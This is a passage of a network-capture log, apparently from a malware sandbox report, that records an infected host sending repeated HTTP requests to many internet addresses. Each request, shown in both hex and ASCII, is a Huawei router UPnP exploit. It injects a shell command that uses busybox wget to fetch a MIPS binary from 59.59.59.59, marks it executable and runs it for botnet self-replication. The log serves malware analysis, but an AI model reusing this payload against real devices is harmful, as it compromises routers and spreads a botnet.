2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          913192.168.2.1541816197.222.11.18837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.707600117 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          914192.168.2.1557594197.17.117.19337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.707619905 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          915192.168.2.154479241.87.1.8537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.707626104 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          916192.168.2.1559980197.206.116.2537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.707664013 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          917192.168.2.1551110197.54.192.14737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.707668066 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          918192.168.2.154043870.207.45.23837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.707695007 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          919192.168.2.155131241.193.46.14137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.707710028 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          920192.168.2.1546772172.184.5.9937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.707746029 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          921192.168.2.15493664.216.85.7737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.707747936 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          922192.168.2.154325270.34.211.337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.707762003 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          923192.168.2.15387525.144.7.11037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.707830906 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
